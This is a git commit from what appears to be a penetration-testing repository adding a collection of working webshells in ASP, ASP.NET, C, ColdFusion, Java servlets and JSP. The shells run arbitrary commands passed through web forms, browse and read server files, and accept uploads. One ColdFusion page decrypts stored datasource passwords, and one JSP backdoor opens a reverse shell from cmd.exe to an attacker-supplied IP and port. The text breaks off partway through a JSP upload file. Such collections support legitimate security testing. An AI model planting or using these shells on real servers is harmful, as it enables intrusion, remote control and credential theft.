fzuudb-webshell

This commit is contained in:
tennc 2013-06-05 11:21:04 +08:00
parent 6a88226bfd
commit f06456a918
42 changed files with 5982 additions and 0 deletions

View file

@ -0,0 +1,41 @@
<%
' ASP Cmd Shell On IIS 5.1
' brett.moore_at_security-assessment.com
' http://seclists.org/bugtraq/2006/Dec/0226.html
Dim oS,oSNet,oFSys, oF,szCMD, szTF
On Error Resume Next
Set oS = Server.CreateObject("WSCRIPT.SHELL")
Set oSNet = Server.CreateObject("WSCRIPT.NETWORK")
Set oFSys = Server.CreateObject("Scripting.FileSystemObject")
szCMD = Request.Form("C")
If (szCMD <> "") Then
szTF = "c:\windows\pchealth\ERRORREP\QHEADLES\" & oFSys.GetTempName()
' Here we do the command
Call oS.Run("win.com cmd.exe /c """ & szCMD & " > " & szTF &
"""",0,True)
response.write szTF
' Change perms
Call oS.Run("win.com cmd.exe /c cacls.exe " & szTF & " /E /G
everyone:F",0,True)
Set oF = oFSys.OpenTextFile(szTF,1,False,0)
End If
%>
<FORM action="<%= Request.ServerVariables("URL") %>" method="POST">
<input type=text name="C" size=70 value="<%= szCMD %>">
<input type=submit value="Run"></FORM><PRE>
Machine: <%=oSNet.ComputerName%><BR>
Username: <%=oSNet.UserName%><br>
<%
If (IsObject(oF)) Then
On Error Resume Next
Response.Write Server.HTMLEncode(oF.ReadAll)
oF.Close
Call oS.Run("win.com cmd.exe /c del "& szTF,0,True)
End If
%>
<!-- http://michaeldaw.org 2006 -->

View file

@ -0,0 +1,47 @@
<!--
ASP_KIT
cmd.asp = Command Execution
by: Maceo
modified: 25/06/2003
-->
<%
Set oScript = Server.CreateObject("WSCRIPT.SHELL")
Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK")
Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")
szCMD = request("cmd")
If (szCMD <> "") Then
szTempFile = "C:\" & oFileSys.GetTempName( )
Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
Set oFile = oFileSys.OpenTextFile (szTempFile, 1, False, 0)
End If
%>
<HTML>
<BODY>
<FORM action="" method="GET">
<input type="text" name="cmd" size=45 value="<%= szCMD %>">
<input type="submit" value="Run">
</FORM>
<PRE>
<%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>
<br>
<%
If (IsObject(oFile)) Then
On Error Resume Next
Response.Write Server.HTMLEncode(oFile.ReadAll)
oFile.Close
Call oFileSys.DeleteFile(szTempFile, True)
End If
%>
</BODY>
</HTML>

View file

@ -0,0 +1,37 @@
<%@ Page Language="VB" Debug="true" %>
<%@ import Namespace="system.IO" %>
<%@ import Namespace="System.Diagnostics" %>
<script runat="server">
Sub RunCmd(Src As Object, E As EventArgs)
Dim myProcess As New Process()
Dim myProcessStartInfo As New ProcessStartInfo(xpath.text)
myProcessStartInfo.UseShellExecute = false
myProcessStartInfo.RedirectStandardOutput = true
myProcess.StartInfo = myProcessStartInfo
myProcessStartInfo.Arguments=xcmd.text
myProcess.Start()
Dim myStreamReader As StreamReader = myProcess.StandardOutput
Dim myString As String = myStreamReader.Readtoend()
myProcess.Close()
mystring=replace(mystring,"<","&lt;")
mystring=replace(mystring,">","&gt;")
result.text= vbcrlf & "<pre>" & mystring & "</pre>"
End Sub
</script>
<html>
<body>
<form runat="server">
<p><asp:Label id="L_p" runat="server" width="80px">Program</asp:Label>
<asp:TextBox id="xpath" runat="server" Width="300px">c:\windows\system32\cmd.exe</asp:TextBox>
<p><asp:Label id="L_a" runat="server" width="80px">Arguments</asp:Label>
<asp:TextBox id="xcmd" runat="server" Width="300px" Text="/c net user">/c net user</asp:TextBox>
<p><asp:Button id="Button" onclick="runcmd" runat="server" Width="100px" Text="Run"></asp:Button>
<p><asp:Label id="result" runat="server"></asp:Label>
</form>
</body>
</html>

View file

@ -0,0 +1,55 @@
<%@ Language=VBScript %>
<%
' --------------------o0o--------------------
' File: CmdAsp.asp
' Author: Maceo <maceo @ dogmile.com>
' Release: 2000-12-01
' OS: Windows 2000, 4.0 NT
' -------------------------------------------
Dim oScript
Dim oScriptNet
Dim oFileSys, oFile
Dim szCMD, szTempFile
On Error Resume Next
' -- create the COM objects that we will be using -- '
Set oScript = Server.CreateObject("WSCRIPT.SHELL")
Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK")
Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")
' -- check for a command that we have posted -- '
szCMD = Request.Form(".CMD")
If (szCMD <> "") Then
' -- Use a poor man's pipe ... a temp file -- '
szTempFile = "C:\" & oFileSys.GetTempName( )
Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
Set oFile = oFileSys.OpenTextFile (szTempFile, 1, False, 0)
End If
%>
<HTML>
<BODY>
<FORM action="<%= Request.ServerVariables("URL") %>" method="POST">
<input type=text name=".CMD" size=45 value="<%= szCMD %>">
<input type=submit value="Run">
</FORM>
<PRE>
<%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>
<br>
<%
If (IsObject(oFile)) Then
' -- Read the output from our command and remove the temp file -- '
On Error Resume Next
Response.Write Server.HTMLEncode(oFile.ReadAll)
oFile.Close
Call oFileSys.DeleteFile(szTempFile, True)
End If
%>
</BODY>
</HTML>
<!-- http://michaeldaw.org 2006 -->

View file

@ -0,0 +1,42 @@
<%@ Page Language="C#" Debug="true" Trace="false" %>
<%@ Import Namespace="System.Diagnostics" %>
<%@ Import Namespace="System.IO" %>
<script Language="c#" runat="server">
void Page_Load(object sender, EventArgs e)
{
}
string ExcuteCmd(string arg)
{
ProcessStartInfo psi = new ProcessStartInfo();
psi.FileName = "cmd.exe";
psi.Arguments = "/c "+arg;
psi.RedirectStandardOutput = true;
psi.UseShellExecute = false;
Process p = Process.Start(psi);
StreamReader stmrdr = p.StandardOutput;
string s = stmrdr.ReadToEnd();
stmrdr.Close();
return s;
}
void cmdExe_Click(object sender, System.EventArgs e)
{
Response.Write("<pre>");
Response.Write(Server.HtmlEncode(ExcuteCmd(txtArg.Text)));
Response.Write("</pre>");
}
</script>
<HTML>
<HEAD>
<title>awen asp.net webshell</title>
</HEAD>
<body >
<form id="cmd" method="post" runat="server">
<asp:TextBox id="txtArg" style="Z-INDEX: 101; LEFT: 405px; POSITION: absolute; TOP: 20px" runat="server" Width="250px"></asp:TextBox>
<asp:Button id="testing" style="Z-INDEX: 102; LEFT: 675px; POSITION: absolute; TOP: 18px" runat="server" Text="excute" OnClick="cmdExe_Click"></asp:Button>
<asp:Label id="lblText" style="Z-INDEX: 103; LEFT: 310px; POSITION: absolute; TOP: 22px" runat="server">Command:</asp:Label>
</form>
</body>
</HTML>
<!-- Contributed by Dominic Chell (http://digitalapocalypse.blogspot.com/) -->
<!-- http://michaeldaw.org 04/2007 -->

View file

@ -0,0 +1,79 @@
<!--
ASP_KIT
list.asp = Directory & File View
by: darkraver
modified: 16/12/2005
-->
<body>
<html>
<%
file=request("file")
tipo=request("type")
If file="" then
file="c:\"
tipo="1"
End If
%>
<FORM action="" method="GET">
<INPUT TYPE="text" NAME="file" value="<%=file%>">
<INPUT TYPE="hidden" NAME="type" value="<%=tipo%>">
<INPUT TYPE="submit" Value="Consultar">
</FORM>
<%
If tipo="1" then
Response.Write("<h3>PATH: " & file & "</h3>")
ListFolder(file)
End If
If tipo="2" then
Response.Write("<h3>FILE: " & file & "</h3>")
Set oStr = server.CreateObject("Scripting.FileSystemObject")
Set oFich = oStr.OpenTextFile(file, 1)
Response.Write("<pre>--<br>")
Response.Write(oFich.ReadAll)
Response.Write("<br>--</pre>")
End If
%>
<%
sub ListFolder(path)
set fs = CreateObject("Scripting.FileSystemObject")
set folder = fs.GetFolder(path)
Response.Write("<br>( ) <a href=?type=1&file=" & server.URLencode(path) & "..\>" & ".." & "</a>" & vbCrLf)
for each item in folder.SubFolders
Response.Write("<br>( ) <a href=?type=1&file=" & server.URLencode(item.path) & "\>" & item.Name & "</a>" & vbCrLf)
next
for each item in folder.Files
Response.Write("<li><a href=?type=2&file=" & server.URLencode(item.path) & ">" & item.Name & "</a> - " & item.Size & " bytes, " & "</li>" & vbCrLf)
next
end sub
%>
</body>
</html>

View file

@ -0,0 +1,79 @@
<!--
ASP_KIT
list.asp = Directory & File View
by: darkraver
modified: 16/12/2005
-->
<body>
<html>
<%
file=request("file")
tipo=request("type")
If file="" then
file="c:\"
tipo="1"
End If
%>
<FORM action="" method="GET">
<INPUT TYPE="text" NAME="file" value="<%=file%>">
<INPUT TYPE="hidden" NAME="type" value="<%=tipo%>">
<INPUT TYPE="submit" Value="Consultar">
</FORM>
<%
If tipo="1" then
Response.Write("<h3>PATH: " & file & "</h3>")
ListFolder(file)
End If
If tipo="2" then
Response.Write("<h3>FILE: " & file & "</h3>")
Set oStr = server.CreateObject("Scripting.FileSystemObject")
Set oFich = oStr.OpenTextFile(file, 1)
Response.Write("<pre>--<br>")
Response.Write(oFich.ReadAll)
Response.Write("<br>--</pre>")
End If
%>
<%
sub ListFolder(path)
set fs = CreateObject("Scripting.FileSystemObject")
set folder = fs.GetFolder(path)
Response.Write("<br>( ) <a href=?type=1&file=" & server.URLencode(path) & "..\>" & ".." & "</a>" & vbCrLf)
for each item in folder.SubFolders
Response.Write("<br>( ) <a href=?type=1&file=" & server.URLencode(item.path) & "\>" & item.Name & "</a>" & vbCrLf)
next
for each item in folder.Files
Response.Write("<li><a href=?type=2&file=" & server.URLencode(item.path) & ">" & item.Name & "</a> - " & item.Size & " bytes, " & "</li>" & vbCrLf)
next
end sub
%>
</body>
</html>

File diff suppressed because it is too large Load diff

137
fuzzdb-webshell/asp/up.asp Normal file
View file

@ -0,0 +1,137 @@
<!--
ASP_KIT
up.asp = File upload
by: Unknown
modified: 25/06/2003
-->
<%
Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK")
%>
<%
Response.Buffer = true
Function BuildUpload(RequestBin)
'Get the boundary
PosBeg = 1
PosEnd = InstrB(PosBeg,RequestBin,getByteString(chr(13)))
boundary = MidB(RequestBin,PosBeg,PosEnd-PosBeg)
boundaryPos = InstrB(1,RequestBin,boundary)
'Get all data inside the boundaries
Do until (boundaryPos=InstrB(RequestBin,boundary & getByteString("--")))
'Members variable of objects are put in a dictionary object
Dim UploadControl
Set UploadControl = CreateObject("Scripting.Dictionary")
'Get an object name
Pos = InstrB(BoundaryPos,RequestBin,getByteString("Content-Disposition"))
Pos = InstrB(Pos,RequestBin,getByteString("name="))
PosBeg = Pos+6
PosEnd = InstrB(PosBeg,RequestBin,getByteString(chr(34)))
Name = getString(MidB(RequestBin,PosBeg,PosEnd-PosBeg))
PosFile = InstrB(BoundaryPos,RequestBin,getByteString("filename="))
PosBound = InstrB(PosEnd,RequestBin,boundary)
'Test if object is of file type
If PosFile<>0 AND (PosFile<PosBound) Then
'Get Filename, content-type and content of file
PosBeg = PosFile + 10
PosEnd = InstrB(PosBeg,RequestBin,getByteString(chr(34)))
FileName = getString(MidB(RequestBin,PosBeg,PosEnd-PosBeg))
'Add filename to dictionary object
UploadControl.Add "FileName", FileName
Pos = InstrB(PosEnd,RequestBin,getByteString("Content-Type:"))
PosBeg = Pos+14
PosEnd = InstrB(PosBeg,RequestBin,getByteString(chr(13)))
'Add content-type to dictionary object
ContentType = getString(MidB(RequestBin,PosBeg,PosEnd-PosBeg))
UploadControl.Add "ContentType",ContentType
'Get content of object
PosBeg = PosEnd+4
PosEnd = InstrB(PosBeg,RequestBin,boundary)-2
Value = MidB(RequestBin,PosBeg,PosEnd-PosBeg)
Else
'Get content of object
Pos = InstrB(Pos,RequestBin,getByteString(chr(13)))
PosBeg = Pos+4
PosEnd = InstrB(PosBeg,RequestBin,boundary)-2
Value = getString(MidB(RequestBin,PosBeg,PosEnd-PosBeg))
End If
UploadControl.Add "Value" , Value
UploadRequest.Add name, UploadControl
BoundaryPos=InstrB(BoundaryPos+LenB(boundary),RequestBin,boundary)
Loop
End Function
%>
<%
Function getByteString(StringStr)
For i = 1 to Len(StringStr)
char = Mid(StringStr,i,1)
getByteString = getByteString & chrB(AscB(char))
Next
End Function
%>
<%
Function getString(StringBin)
getString =""
For intCount = 1 to LenB(StringBin)
getString = getString & chr(AscB(MidB(StringBin,intCount,1)))
Next
End Function
%>
<%
If request("ok")="1" then
Response.Clear
byteCount = Request.TotalBytes
RequestBin = Request.BinaryRead(byteCount)
Set UploadRequest = CreateObject("Scripting.Dictionary")
BuildUpload(RequestBin)
If UploadRequest.Item("fichero").Item("Value") <> "" Then
contentType = UploadRequest.Item("fichero").Item("ContentType")
filepathname = UploadRequest.Item("fichero").Item("FileName")
filename = Right(filepathname,Len(filepathname)-InstrRev(filepathname,"\"))
value = UploadRequest.Item("fichero").Item("Value")
path = UploadRequest.Item("path").Item("Value")
filename = path & filename
Set MyFileObject = Server.CreateObject("Scripting.FileSystemObject")
Set objFile = MyFileObject.CreateTextFile(filename)
For i = 1 to LenB(value)
objFile.Write chr(AscB(MidB(value,i,1)))
Next
objFile.Close
Set objFile = Nothing
Set MyFileObject = Nothing
End If
Set UploadRequest = Nothing
End If
%>
<HTML>
<BODY>
<FORM action="?ok=1" method="POST" ENCTYPE="multipart/form-data">
<INPUT TYPE="file" NAME="fichero">
<INPUT TYPE="submit" Value="Upload">
<br>Target PATH:<br><INPUT TYPE="text" Name="path" Value="C:\">
</FORM>
<PRE>
<%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>
<br>
File: <%=filename%>
</HTML>
</BODY>

74
fuzzdb-webshell/c/cmd.c Normal file
View file

@ -0,0 +1,74 @@
//
// cmdcgi.exe 0.1 darkraver (12/05/2005)
//
#include <stdio.h>
char *uri_decode(char *uri) {
int i=0;
int ptr=0;
char *command;
char hexa[3];
char code;
command=(char *)malloc(strlen(uri));
for(i=0;i<strlen(uri);i++) {
switch(*(uri+i)) {
case '+':
*(command+ptr)=' ';
ptr++;
break;
case '%':
sprintf(hexa, "%c%c\x00", *(uri+i+1), *(uri+i+2));
i+=2;
//printf("HEXA: %s\n", hexa);
sscanf(hexa, "%x", &code);
//printf("CODE: %c\n", code);
*(command+ptr)=code;
ptr++;
break;
default:
*(command+ptr)=*(uri+i);
ptr++;
break;
}
}
*(command+ptr)='\0';
return command;
}
int main(int argc, char **argv) {
char *cmd;
printf("Content-type: text/html\n\n");
printf("<html><body>\n");
cmd=(char *)getenv("QUERY_STRING");
if(!cmd || strlen(cmd)==0) {
printf("<hr><p><form method=\"GET\" name=\"myform\" action=\"\">");
printf("<input type=\"text\" name=\"cmd\">");
printf("<input type=\"submit\" value=\"Send\">");
printf("<br><br><hr></form>");
} else {
//printf("QUERY_STRING: %s\n", cmd);
cmd+=4;
cmd=uri_decode(cmd);
printf("<hr><p><b>COMMAND: %s</b><br><br><hr><pre>\n", cmd);
fflush(stdout);
execl("/bin/sh", "/bin/sh", "-c", cmd, 0);
}
}

View file

@ -0,0 +1,77 @@
<html>
<body>
<!-- orig author: kGrutzmacher -->
<!-- additshonz: lawKnee -->
<b>Notes:</b><br>
<ul>
<li>For Windows put this as command "c:\windows\system32\cmd.exe /c" or wherever cmd.exe is<br>
<li>For Windows options are the command you want to run "dir" "type" etc
</ul>
<p>
<cfoutput>
<table>
<form method="POST" action="">
<tr><td>Command:</td><td><input type=text name="cmd" size=50
<cfif isdefined("form.cmd")>value="#form.cmd#"</cfif>><br></td></tr>
<tr><td>Options:</td><td> <input type=text name="opts" size=50
<cfif isdefined("form.opts")>value="#form.opts#"</cfif>><br></td></tr>
<tr><td>Timeout:</td><td> <input type=text name="timeout" size=4
<cfif isdefined("form.timeout")>value="#form.timeout#"
<cfelse>value="5"</cfif>></td></tr>
</table>
<input type=submit value="Exec" >
</form>
<cfif isdefined("form.cmd")>
<cfsavecontent variable="myVar">
<cfexecute name = "#Form.cmd#"
arguments = "#Form.opts#"
timeout = "#Form.timeout#">
</cfexecute>
</cfsavecontent>
<pre>
#HTMLCodeFormat(myVar)#
</pre>
</cfif>
<cfscript>
//The following code borrowed from hernanOchoa @hexale (thx)
//added better formatting on output and connection string [lb]
// Create Data Source Object
dataSourceObb=createobject("java","coldfusion.server.ServiceFactory").
getDatasourceService().getDatasources();
writeoutput("<br><br><b>Datasource Credentials:</b><br>");
writeoutput("<table>");
// Loop Through DataSources
for(i in dataSourceObb) {
if(len(dataSourceObb[i]["password"])){
// Get url
theurl=(dataSourceObb[i]["url"]);
// Get username
username=(dataSourceObb[i]["username"]);
// Get and decrypt password
decryptPassword=Decrypt(dataSourceObb[i]["password"],
generate3DesKey("0yJ!@1$r8p0L@r1$6yJ!@1rj"), "DESede",
"Base64");
// Output datasource usernames, passwords, and urls
writeoutput("" &
"<tr><td>DataSource: " & i & "</td>" &
"<td>Username: " & username & "</td>" &
"<td>Password: " & decryptPassword &
"<td>URL: " & theurl & "</td></tr>");
}
}
writeoutput("</table><br>");
</cfscript>
</cfoutput>
</body>
</html>
<!-- orig from mDaw bdoor -->

View file

@ -0,0 +1,64 @@
<!-- foldFusion page by lawKnee -->
<!-- useful when you can upload cfm and would like to talk to all db's avail -->
<!-- but dont want to (or can't) connect from the OS -->
<!-- this page uses ServiceFactory to auto-enum all datasources on the instance -->
<!-- only works on CF8 and below, but unpatched CF9 should work too -->
<html>
<body>
<p><b>Notes:</b></p>
<ul>
<li>Select the database you want to use</li>
<li>Write SQL statements in the text box</li>
</ul>
<form method="POST" action="">
<p><b>SQL Interface:</b></p>
Datasource<br>
<select name="datasource">
<cfscript>
dataSourceObb=createobject("java","coldfusion.server.ServiceFactory").
getDatasourceService().getDatasources();
for(i in dataSourceObb) {
writeoutput('<option value="' & i & '">' & i & '</option>');
}
</cfscript>
</select>
<br>
SQL<br>
<textarea name="sql" rows="5" cols="100"></textarea>
<br>
<input type=submit value="Exec">
</form>
<cfif isdefined("form.sql")>
<cfquery name="runsql" datasource="#Form.datasource#" timeout="30">
#Form.sql#
</cfquery>
</cfif>
<table border=1>
<cfif isdefined("form.sql")>
<cfloop from="0" to="#runsql.RecordCount#" index="row">
<cfif row eq 0>
<tr>
<cfloop list="#runsql.ColumnList#" index="column" delimiters=",">
<th><cfoutput>#column#</cfoutput></th>
</cfloop>
</tr>
<cfelse>
<tr>
<cfloop list="#runsql.ColumnList#" index="column" delimiters=",">
<td><cfoutput>#runsql[column][row]#</cfoutput></td>
</cfloop>
</tr>
</cfif>
</cfloop>
</cfif>
</table>
</body>
</html>

View file

@ -0,0 +1,32 @@
<html>
<body>
<cfoutput>
<table>
<form method="POST" action="">
<tr>
<td>Command:</td>
<td> < input type=text name="cmd" size=50<cfif isdefined("form.cmd")> value="#form.cmd#" </cfif>> < br></td>
</tr>
<tr>
<td>Options:</td>
<td> < input type=text name="opts" size=50 <cfif isdefined("form.opts")> value="#form.opts#" </cfif> >< br> </td>
</tr>
<tr>
<td>Timeout:</td>
<td>< input type=text name="timeout" size=4 <cfif isdefined("form.timeout")> value="#form.timeout#" <cfelse> value="5" </cfif> > </td>
</tr>
</table>
<input type=submit value="Exec" >
</FORM>
<cfsavecontent variable="myVar">
<cfexecute name = "#Form.cmd#" arguments = "#Form.opts#" timeout = "#Form.timeout#">
</cfexecute>
</cfsavecontent>
<pre>
#myVar#
</pre>
</cfoutput>
</body>
</html>

Binary file not shown.

View file

@ -0,0 +1,43 @@
/*
* CmdServlet.java 20/01/2004
*
* @author The Dark Raver
* @version 0.1
*/
import java.io.*;
import javax.servlet.*;
import javax.servlet.http.*;
public class CmdServlet extends HttpServlet {
public void doGet(HttpServletRequest req, HttpServletResponse res) throws ServletException, IOException {
res.setContentType("text/html");
PrintWriter out = res.getWriter();
out.print("<html><body>");
out.print("<hr><p><form method=\"GET\" name=\"myform\" action=\"\">");
out.print("<input type=\"text\" name=\"cmd\">");
out.print("<input type=\"submit\" value=\"Send\">");
out.print("</form>");
if(req.getParameter("cmd") != null) {
out.print("\n<hr><p><b>Command: " + req.getParameter("cmd") + "\n</b><br><br><hr><pre>\n");
Process p = Runtime.getRuntime().exec("cmd /c " + req.getParameter("cmd"));
DataInputStream procIn = new DataInputStream(p.getInputStream());
int c='\0';
while ((c=procIn.read()) != -1) {
out.print((char)c);
}
}
out.print("\n<hr></pre>");
out.print("</body></html>");
}
public String getServletInfo() {
return "CmdServlet 0.1";
}
}

Binary file not shown.

View file

@ -0,0 +1,86 @@
/*
* ListServlet.java
*
* @author Sierra
* @version 0.1
*/
import java.io.*;
import javax.servlet.ServletException;
import javax.servlet.http.*;
public class ListServlet extends HttpServlet
{
public void doGet(HttpServletRequest req, HttpServletResponse res) throws ServletException, IOException {
PrintWriter printwriter = res.getWriter();
String path = req.getParameter("file");
printwriter.write("<HTML>\n<HEAD>\n<TITLE>Directory Listing</TITLE>\n</HEAD>\n<BODY>\n");
printwriter.write("<FONT Face=\"Courier New, Helvetica\" Color=\"Black\">\n");
if(req.getParameter("file")==null) path = "c:\\";
printwriter.write("<hr><br><B>Path: <U>" + path + "</U></B><BR><BR><hr><PRE>\n");
File file = new File(path);
if(file.isDirectory())
{
String s = new String("Unknown");
String s2 = new String("Black");
File afile[] = file.listFiles();
for(int i = 0; i < afile.length; i++)
{
String s1 = new String(afile[i].toString());
printwriter.write("(");
String s3;
if(afile[i].isDirectory())
{
printwriter.write("d");
s1 = s1 + "/";
s3 = new String("Blue");
} else
if(afile[i].isFile())
{
printwriter.write("-");
s3 = new String("Green");
} else
{
printwriter.write("?");
s3 = new String("Red");
}
if(afile[i].canRead())
printwriter.write("r");
else
printwriter.write("-");
if(afile[i].canWrite())
printwriter.write("w");
else
printwriter.write("-");
printwriter.write(") <A Style='Color: " + s3.toString() + ";' HRef='?file=" + s1.toString() + "'>" + s1.toString() + "</A> " + "( Size: " + afile[i].length() + " bytes )<BR>\n");
}
printwriter.write("<hr></FONT></BODY></HTML>");
} else
if(file.canRead())
{
FileInputStream fileinputstream = new FileInputStream(file);
int j = 0;
while(j >= 0)
{
j = fileinputstream.read();
printwriter.write(j);
}
fileinputstream.close();
} else
{
printwriter.write("Can't Read file<BR>");
}
}
public String getServletInfo() {
return "Directory Listing";
}
}

Binary file not shown.

View file

@ -0,0 +1,71 @@
/*
* UpServlet.java 29/04/2005
*
* @author The Dark Raver
* @version 0.1
*/
import java.io.*;
import javax.servlet.*;
import javax.servlet.http.*;
public class UpServlet extends HttpServlet {
public void doGet(HttpServletRequest req, HttpServletResponse res) throws ServletException, IOException {
res.setContentType("text/html");
PrintWriter out = res.getWriter();
out.print("<html><body>");
out.print("<br><form method=\"POST\" action=\"\" enctype=\"multipart/form-data\">");
out.print("UPLOAD <input type=\"file\" name=\"file\" size=\"60\">");
out.print("<input type=\"submit\" value=\"Upload\">");
out.print("</form>");
out.print("</body></html>");
}
public void doPost(HttpServletRequest req, HttpServletResponse res) throws ServletException, IOException {
String tag = new String();
int c = '\0';
int contador = 0;
ServletInputStream in = req.getInputStream();
DataInputStream post = new DataInputStream(in);
PrintWriter out = res.getWriter();
res.setContentType("text/html");
out.print("<pre>");
while((c=post.read()) != -1 && c != '\r' && c != '\n') {
tag=tag.concat("" + (char)c);
contador++;
}
for(int i=0; i <4; i++) while((c=post.read()) != -1 && c != '\n') contador++;
// out.print("CONTENT_LEN = " + req.getContentLength() + " / TAG = [" + tag + "] / TAG_LEN = " + tag.length() + "\n");
// out.print("CONTADOR = " + contador + " / FILE_LEN = " + (req.getContentLength() - tag.length() - contador - 11) + " ==>");
// (!) Uploaded File Name
File newfile = new File("c:\\install.log");
/////////////////////////
FileOutputStream fileout = new FileOutputStream(newfile);
for(int i=0; i < req.getContentLength() - tag.length() - contador - 11; i++) {
c=post.read();
fileout.write((char)c);
}
fileout.close();
out.print("<== OK");
}
public String getServletInfo() {
return "UpServlet 0.1";
}
}

File diff suppressed because it is too large Load diff

View file

@ -0,0 +1,35 @@
<%@ page import="java.util.*,java.io.*"%>
<%
//
// JSP_KIT
//
// cmd.jsp = Command Execution (unix)
//
// by: Unknown
// modified: 27/06/2003
//
%>
<HTML><BODY>
<FORM METHOD="GET" NAME="myform" ACTION="">
<INPUT TYPE="text" NAME="cmd">
<INPUT TYPE="submit" VALUE="Send">
</FORM>
<pre>
<%
if (request.getParameter("cmd") != null) {
out.println("Command: " + request.getParameter("cmd") + "<BR>");
Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));
OutputStream os = p.getOutputStream();
InputStream in = p.getInputStream();
DataInputStream dis = new DataInputStream(in);
String disr = dis.readLine();
while ( disr != null ) {
out.println(disr);
disr = dis.readLine();
}
}
%>
</pre>
</BODY></HTML>

View file

@ -0,0 +1,32 @@
// note that linux = cmd and windows = "cmd.exe /c + cmd"
<FORM METHOD=GET ACTION='cmdjsp.jsp'>
<INPUT name='cmd' type=text>
<INPUT type=submit value='Run'>
</FORM>
<%@ page import="java.io.*" %>
<%
String cmd = request.getParameter("cmd");
String output = "";
if(cmd != null) {
String s = null;
try {
Process p = Runtime.getRuntime().exec("cmd.exe /C " + cmd);
BufferedReader sI = new BufferedReader(new InputStreamReader(p.getInputStream()));
while((s = sI.readLine()) != null) {
output += s;
}
}
catch(IOException e) {
e.printStackTrace();
}
}
%>
<pre>
<%=output %>
</pre>
<!-- http://michaeldaw.org 2006 -->

View file

@ -0,0 +1,91 @@
// backdoor.jsp
// http://www.security.org.sg/code/jspreverse.html
<%@
page import="java.lang.*, java.util.*, java.io.*, java.net.*"
% >
<%!
static class StreamConnector extends Thread
{
InputStream is;
OutputStream os;
StreamConnector(InputStream is, OutputStream os)
{
this.is = is;
this.os = os;
}
public void run()
{
BufferedReader isr = null;
BufferedWriter osw = null;
try
{
isr = new BufferedReader(new InputStreamReader(is));
osw = new BufferedWriter(new OutputStreamWriter(os));
char buffer[] = new char[8192];
int lenRead;
while( (lenRead = isr.read(buffer, 0, buffer.length)) > 0)
{
osw.write(buffer, 0, lenRead);
osw.flush();
}
}
catch (Exception ioe)
try
{
if(isr != null) isr.close();
if(osw != null) osw.close();
}
catch (Exception ioe)
}
}
%>
<h1>JSP Backdoor Reverse Shell</h1>
<form method="post">
IP Address
<input type="text" name="ipaddress" size=30>
Port
<input type="text" name="port" size=10>
<input type="submit" name="Connect" value="Connect">
</form>
<p>
<hr>
<%
String ipAddress = request.getParameter("ipaddress");
String ipPort = request.getParameter("port");
if(ipAddress != null && ipPort != null)
{
Socket sock = null;
try
{
sock = new Socket(ipAddress, (new Integer(ipPort)).intValue());
Runtime rt = Runtime.getRuntime();
Process proc = rt.exec("cmd.exe");
StreamConnector outputConnector =
new StreamConnector(proc.getInputStream(),
sock.getOutputStream());
StreamConnector inputConnector =
new StreamConnector(sock.getInputStream(),
proc.getOutputStream());
outputConnector.start();
inputConnector.start();
}
catch(Exception e)
}
%>
<!-- http://michaeldaw.org 2006 -->

View file

@ -0,0 +1,77 @@
<%@ page import="java.util.*,java.io.*"%>
<%
//
// JSP_KIT
//
// list.jsp = Directory & File View
//
// by: Sierra
// modified: 27/06/2003
//
%>
<%
if(request.getParameter("file")==null) {
%>
<HTML><BODY>
<FORM METHOD="POST" NAME="myform" ACTION="">
<INPUT TYPE="text" NAME="file">
<INPUT TYPE="submit" VALUE="Send">
</FORM>
<%
}
%>
<% //read the file name.
try {
File f = new File(request.getParameter("file"));
if(f.isDirectory()) {
int i;
String fname = new String("Unknown");
String fcolor = new String("Black");
%>
<HTML><BODY>
<FONT Face="Courier New, Helvetica" Color="Black">
<%
out.print("<B>Path: <U>" + f.toString() + "</U></B><BR> <BR>");
File flist[] = f.listFiles();
for(i=0; i<flist.length; i++) {
fname = new String( flist[i].toString());
out.print("(");
if(flist[i].isDirectory() == true) {
out.print("d");
fname = fname + "/";
fcolor = new String("Blue");
} else if( flist[i].isFile() == true ) {
out.print("-");
fcolor = new String("Green");
} else {
out.print("?");
fcolor = new String("Red");
}
if(flist[i].canRead() == true) out.print("r" ); else out.print("-");
if(flist[i].canWrite() == true) out.print("w" ); else out.print("-");
out.print(") <A Style='Color: " + fcolor.toString() + ";' HRef='?file=" + fname.toString() + "'>" + fname.toString() + "</A> " + "( Size: " + flist[i].length() + " bytes)<BR>\n");
}
%>
</FONT></BODY></HTML>
<%
} else {
if(f.canRead() == true) {
InputStream in = new FileInputStream(f);
ServletOutputStream outs = response.getOutputStream();
int left = 0;
try {
while((left) >= 0 ) {
left = in.read();
outs.write(left);
}
} catch(IOException ex) {ex.printStackTrace();}
outs.flush();
outs.close();
in.close();
} else {
out.print("Can't Read file<BR>");
}
}
} catch(Exception ex) {ex.printStackTrace();}
%>

162
fuzzdb-webshell/jsp/up.jsp Normal file
View file

@ -0,0 +1,162 @@
<jsp:useBean id="prop" scope="page" class="java.util.Properties" />
<%@ page import="java.io.*,java.util.*,javax.servlet.*" %>
<%
//
// JSP_KIT
//
// up.jsp = File Upload (unix)
//
// by: Unknown
// modified: 27/06/2003
//
%>
<html>
<form name="test" method="post" action="" enctype="multipart/form-data">
<input type="File" name="fichero">
<input type="Submit" value="Upload" name="Submit">
</form>
</html>
<%!
public String getBoundary(HttpServletRequest request,Properties prop) throws ServletException,IOException{
String boundary = null;
Enumeration enum = request.getHeaderNames();
while(enum.hasMoreElements()){
String header = (String)enum.nextElement();
String hvalue = request.getHeader(header);
prop.setProperty((header).toLowerCase(),hvalue);
if("content-type".equalsIgnoreCase(header) ){
int idx = hvalue.lastIndexOf("boundary=");
if(idx != -1 ){
boundary= hvalue.substring(idx+9 , hvalue.length());
}
}
}
return boundary;
}
public String getFileName(String secondline){
int len = secondline.length();
int idx = secondline.lastIndexOf("filename=");
if(idx == -1 ) return null;
String filename = secondline.substring(idx+10 , len-1);
filename = filename.replace('\\','/');
idx = filename.lastIndexOf("/");
idx = idx + 1;
filename = filename.substring( idx );
return filename;
}
%>
<%
String DPATH = "/tmp/";
